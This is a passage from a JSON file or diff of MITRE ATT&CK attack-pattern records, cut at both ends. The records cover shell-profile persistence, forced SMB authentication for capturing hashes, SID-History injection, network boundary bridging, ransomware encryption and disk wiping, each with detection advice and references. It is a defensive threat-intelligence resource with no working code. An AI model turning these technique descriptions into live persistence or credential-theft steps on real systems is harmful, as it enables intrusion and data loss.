"description": "Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/" + }, + { + "source_name": "Backdooring an AWS account", + "description": "Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.", + "url": "https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9" + }, + { + "source_name": "Varonis Power Automate Data Exfiltration", + "description": "Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.", + "url": "https://www.varonis.com/blog/power-automate-data-exfiltration" + }, + { + "source_name": "Malware Persistence on OS X", + "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Unix Shell Configuration Modification", + "description": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Robert Wilson", + "Tony Lambert, Red Canary" + ], + "x_mitre_detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /etc/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the /etc/shells file.\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", + "created": "2020-01-24T14:13:45.936Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/004", + "external_id": "T1546.004" + }, + { + "source_name": "intezer-kaiji-malware", + "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.", + "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/" + }, + { + "source_name": "bencane blog bashrc", + "description": "Benjamin Cane. (2013, September 16). Understanding a little more about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.", + "url": "https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/" + }, + { + "source_name": "anomali-rocke-tactics", + "description": "Anomali Threat Research. (2019, October 15). Illicit Cryptomining Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved December 17, 2020.", + "url": "https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect" + }, + { + "source_name": "Linux manual bash invocation", + "description": "ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.", + "url": "https://wiki.archlinux.org/index.php/Bash#Invocation" + }, + { + "source_name": "Tsunami", + "description": "Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved December 17, 2020.", + "url": "https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/" + }, + { + "source_name": "anomali-linux-rabbit", + "description": "Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020.", + "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" + }, + { + "source_name": "Magento", + "description": "Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection Vector. Retrieved December 17, 2020.", + "url": "https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html" + }, + { + "source_name": "ScriptingOSX zsh", + "description": "Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration Files. Retrieved February 25, 2021.", + "url": "https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/" + }, + { + "source_name": "PersistentJXA_leopitt", + "description": "Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell for macOS. Retrieved January 11, 2021.", + "url": "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" + }, + { + "source_name": "code_persistence_zsh", + "description": "Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. Retrieved January 11, 2021.", + "url": "https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js" + }, + { + "source_name": "macOS MS office sandbox escape", + "description": "Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump. Retrieved August 20, 2021.", + "url": "https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a" + }, + { + "source_name": "ESF_filemonitor", + "description": "Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.", + "url": "https://objective-see.com/blog/blog_0x48.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-14T19:30:45.123Z", + "name": "Forced Authentication", + "description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)\n\nThere are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\\\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Teodor Cimpoesu", + "Sudhanshu Chauhan, @Sudhanshu_C" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1187", + "external_id": "T1187" + }, + { + "source_name": "Cylance Redirect to SMB", + "description": "Cylance. (2015, April 13). Redirect to SMB. Retrieved December 21, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf" + }, + { + "source_name": "GitHub Hashjacking", + "description": "Dunning, J. (2016, August 1). Hashjacking. Retrieved December 21, 2017.", + "url": "https://github.com/hob0/hashjacking" + }, + { + "source_name": "Microsoft Managing WebDAV Security", + "description": "Microsoft. (n.d.). Managing WebDAV Security (IIS 6.0). Retrieved December 21, 2017.", + "url": "https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx" + }, + { + "source_name": "Osanda Stealing NetNTLM Hashes", + "description": "Osanda Malith Jayathissa. (2017, March 24). Places of Interest in Stealing NetNTLM Hashes. Retrieved January 26, 2018.", + "url": "https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/" + }, + { + "source_name": "Didier Stevens WebDAV Traffic", + "description": "Stevens, D. (2017, November 13). WebDAV Traffic To Malicious Sites. Retrieved December 21, 2017.", + "url": "https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/" + }, + { + "source_name": "US-CERT APT Energy Oct 2017", + "description": "US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A" + }, + { + "source_name": "Wikipedia Server Message Block", + "description": "Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.", + "url": "https://en.wikipedia.org/wiki/Server_Message_Block" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "SID-History Injection", + "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Alain Homewood, Insomnia Security", + "Vincent Le Toux" + ], + "x_mitre_detection": "Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", + "created": "2020-02-18T18:34:49.414Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1134/005", + "external_id": "T1134.005" + }, + { + "source_name": "Microsoft SID", + "description": "Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx" + }, + { + "source_name": "Microsoft SID-History Attribute", + "description": "Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/ms679833.aspx" + }, + { + "source_name": "Microsoft Well Known SIDs Jun 2017", + "description": "Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.", + "url": "https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems" + }, + { + "source_name": "Microsoft Get-ADUser", + "description": "Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.", + "url": "https://technet.microsoft.com/library/ee617241.aspx" + }, + { + "source_name": "AdSecurity SID History Sept 2015", + "description": "Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.", + "url": "https://adsecurity.org/?p=1772" + }, + { + "source_name": "Microsoft DsAddSidHistory", + "description": "Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/ms677982.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:09.780Z", + "name": "Theft of Operational Information", + "description": "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0882", + "external_id": "T0882" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", + "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Network Boundary Bridging", + "description": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question. Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.\n\nMonitor the border network device’s configuration to validate that the policy enforcement sections are what was intended. Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Firewall", + "System Access Controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "created": "2020-10-19T16:08:29.817Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1599", + "external_id": "T1599" + }, + { + "source_name": "Kaspersky ThreatNeedle Feb 2021", + "description": "Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.", + "url": "https://securelist.com/lazarus-threatneedle/100803/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Data Encrypted for Impact", + "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)\n\nIn the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) \n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as \"print bombing\").(Citation: NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Oleg Kolesnikov, Securonix", + "Mayuresh Dani, Qualys", + "Harshal Tupsamudre, Qualys", + "Travis Smith, Qualys", + "ExtraHop" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.\n\nIn cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "IaaS" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "created": "2019-03-15T13:59:30.390Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1486", + "external_id": "T1486" + }, + { + "source_name": "CarbonBlack Conti July 2020", + "description": "Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.", + "url": "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/" + }, + { + "source_name": "FireEye WannaCry 2017", + "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html" + }, + { + "source_name": "Rhino S3 Ransomware Part 1", + "description": "Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021.", + "url": "https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/" + }, + { + "source_name": "NHS Digital Egregor Nov 2020", + "description": "NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.", + "url": "https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary" + }, + { + "source_name": "US-CERT Ransomware 2016", + "description": "US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA16-091A" + }, + { + "source_name": "US-CERT NotPetya 2017", + "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-181A" + }, + { + "source_name": "US-CERT SamSam 2018", + "description": "US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/AA18-337A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Disk Content Wipe", + "description": "Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for unusual kernel driver installation activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "root", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b82f7d37-b826-4ec9-9391-8e121c78aed7", + "created": "2019-03-29T14:59:50.763Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1488", + "external_id": "T1488" + }, + { + "source_name": "Novetta Blockbuster", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", + "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + }, + { + "source_name": "Novetta Blockbuster Destructive Malware", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", + "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + }, + { + "source_name": "DOJ Lazarus Sony 2018", + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", + "url": "https://www.justice.gov/opa/press-release/file/1092091/download" + } + ], + "object_marking_refs": [ + 